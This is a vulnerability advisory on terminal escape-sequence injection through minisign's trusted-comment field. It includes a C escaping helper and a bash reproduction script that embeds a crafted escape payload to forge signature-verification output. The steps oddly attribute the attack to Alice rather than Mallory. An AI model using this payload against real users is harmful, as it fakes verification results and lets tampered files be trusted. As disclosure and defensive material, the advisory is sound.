Trusted comment Injection (minisign)
A vulnerability in minisign allows attackers to craft signatures whose trusted comment field contains malicious terminal escape sequences or misleading commands.
Impact
Exploitation enables attackers to deceive users during signature verification by injecting terminal control sequences. This can clear the terminal and overwrite the prompt with a forged command invocation, making it appear as if a different file and signature were successfully verified, or more generally confuse users about the content of the trusted comment and of other program output.
Details
minisign supports attaching metadata in a trusted comment to a signature. The trusted comment is stored in plaintext inside the .minisig file and displayed to the user during verification.
However, no sanitization or escaping is applied before printing. Arbitrary byte sequences, including ANSI escape codes, may be inserted.
An attacker can therefore craft a signature whose trusted comment injects terminal sequences that erase the previous output and replace it with a forged verification command line for a different file.
Generally, it is considered best practice for CLI tools, especially cryptographic CLI tools, not to print potentially attacker-controlled data, or at least to first tell the user that what follows is binary output, with a [y/N]-style prompt.
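The missing escaping step, as an added example that is not minisign's own code or its actual fix: a hypothetical helper, escape_untrusted, renders every non-printable byte of the trusted comment as a visible \xNN before it reaches the terminal. The function name, the choice to pass tabs through and the sample string are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy `in` to `out`, replacing every byte outside printable ASCII
 * (0x20..0x7e) with a visible \xNN escape. Tab is passed through (an
 * assumption): the default trusted comment uses it as a separator and it
 * cannot move the cursor backwards. Bytes >= 0x80 are escaped as well,
 * which covers the 8-bit CSI (0x9b) at the cost of mangling UTF-8.
 * Returns the number of bytes escaped, or -1 if `out` is too small. */
static int escape_untrusted(const unsigned char *in, size_t in_len,
                            char *out, size_t out_cap)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;
    int escaped = 0;

    if (out_cap == 0)
        return -1;
    for (size_t i = 0; i < in_len; i++) {
        unsigned char c = in[i];
        int printable = (c >= 0x20 && c <= 0x7e) || c == '\t';
        size_t need = printable ? 1 : 4;
        if (o + need + 1 > out_cap)   /* keep room for the final NUL */
            return -1;
        if (printable) {
            out[o++] = (char)c;
        } else {
            out[o++] = '\\';
            out[o++] = 'x';
            out[o++] = hex[c >> 4];
            out[o++] = hex[c & 0x0f];
            escaped++;
        }
    }
    out[o] = '\0';
    return escaped;
}

int main(void)
{
    /* Constructed sample: clear screen, cursor home, then a forged prompt. */
    const char sample[] = "\x1b[2J\x1b[H$ minisign -V -p pubkey2.txt";
    char shown[4 * sizeof sample];
    int n = escape_untrusted((const unsigned char *)sample, strlen(sample),
                             shown, sizeof shown);
    printf("Trusted comment: %s\n(%d byte(s) escaped)\n", shown, n);
    return 0;
}
```

A non-zero return value is also a cheap signal that the comment deserves a closer look before anything in it is trusted.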
Scenario
Bob is verifying multiple, potentially many, messages from different signers. One of them is Alice, who sent msg2.txt with signature msg2.txt.minisig. Bob previously obtained Alice’s public key pubkey2.txt through a secure channel. Another message comes from Mallory, whose public key pubkey1.txt Bob also previously obtained. Mallory holds a MITM position on Bob’s connection with Alice. When Alice sends her message, Mallory swaps it for a malicious one but leaves the original signature file unchanged. Furthermore, Mallory crafts a special message of her own that produces terminal output designed to deceive Bob into thinking that he verified the signature of Alice’s message successfully.
Detailed Steps to Reproduce
Alice crafts her message in the following way:
#!/bin/bash
echo 'Hello world' > msg1.txt
echo "Creating a minisign key pair..."
rm -f pubkey1.txt seckey1.txt msg1.txt.minisig
minisign -G -W -p pubkey1.txt -s seckey1.txt <<<'[email protected]'
# The trusted comment can contain anything except \r and \n,
# so \e[1E (cursor to the start of the next line) is used instead.
# Alternatively, it could instruct the user to update the software from a malicious source.
tc=$'\e[2J\e[H$ minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisig\e[1ESignature and comment signature verified\e[1ETrusted comment: timestamp:1755343355\tfile:msg2.txt\thashed\e[1Eminisign -V -p pubkey2.txt -m msg2.txt -x msg2.txt.minisig\e[1ESignature and comment signature verified\e[1ETrusted comment: timestamp:1755343359\tfile:msg2.txt\thashed'
minisign -S -s seckey1.txt -m msg1.txt -t "$tc"
# Bob then executes:
minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisig
Bob then executes
$ minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisig
and gets the following output on his terminal.
$ minisign -V -p pubkey1.txt -m msg1.txt -x msg1.txt.minisig
Signature and comment signature verified
Trusted comment: timestamp:1755343355 file:msg2.txt hashed
$ minisign -V -p pubkey2.txt -m msg2.txt -x msg2.txt.minisig
Signature and comment signature verified
Trusted comment: timestamp:1755343359 file:msg2.txt hashed
If Bob is inattentive, he might be tricked into thinking that he already verified Alice’s message.